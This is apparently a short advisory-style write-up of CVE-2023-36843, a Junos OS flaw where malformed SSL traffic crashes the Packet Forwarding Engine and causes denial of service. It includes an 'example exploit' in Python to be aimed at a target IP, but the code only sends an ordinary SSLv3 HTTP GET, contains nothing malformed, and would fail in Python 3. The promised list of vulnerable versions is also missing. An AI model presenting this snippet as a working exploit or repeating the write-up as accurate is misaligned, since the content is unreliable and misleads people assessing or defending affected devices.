CVE-2023-36843 is an Improper Handling of Inconsistent Special Elements vulnerability that impacts the Junos Services Framework (jsf) module in Juniper Networks Junos OS. This vulnerability enables an unauthenticated attacker to create a network-based attack, causing a crash in the Packet Forwarding Engine (PFE). As a result, a Denial of Service (DoS) occurs, requiring a manual restart to recover the affected device.
Affected Devices
This vulnerability affects devices that have Juniper Networks Advanced Threat Prevention (ATP) Cloud enabled with Encrypted Traffic Insights, configured via the security-metadata-streaming policy. Devices running the following versions of Juniper Networks Junos OS are vulnerable:
Exploit Details
When an attacker sends malformed SSL traffic on a vulnerable device, it will cause the Packet Forwarding Engine (PFE) to crash, leading to a DoS scenario where the device no longer processes traffic. The device can only recover through a manual restart.
An example of a code snippet for the exploit could be
import socket
import ssl
target_ip = "192.168.1.1"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_SSLv3)
ssl_sock.connect((target_ip, 443))
ssl_sock.send("GET / HTTP/1.1\r\nHost: " + target_ip + "\r\n\r\n")
response = ssl_sock.recv(1024)
print(response)
ssl_sock.close()
Note: Ensure to replace 192.168.1.1 with the actual target device's IP address.
Original References
Juniper Networks Security Advisory
MITRE CVE-2023-36843 Record
Recommendations
To mitigate this vulnerability, users are advised to upgrade their Juniper Networks Junos OS to the following versions:
22.4R2-S1, 22.4R3 or later (only for 22.4)
Juniper Networks strongly recommends that users apply the necessary updates to protect their devices from this potentially disruptive vulnerability.
Timeline
Published on: 10/12/2023 23:15:11 UTC
Last modified on: 10/17/2023 15:58:59 UTC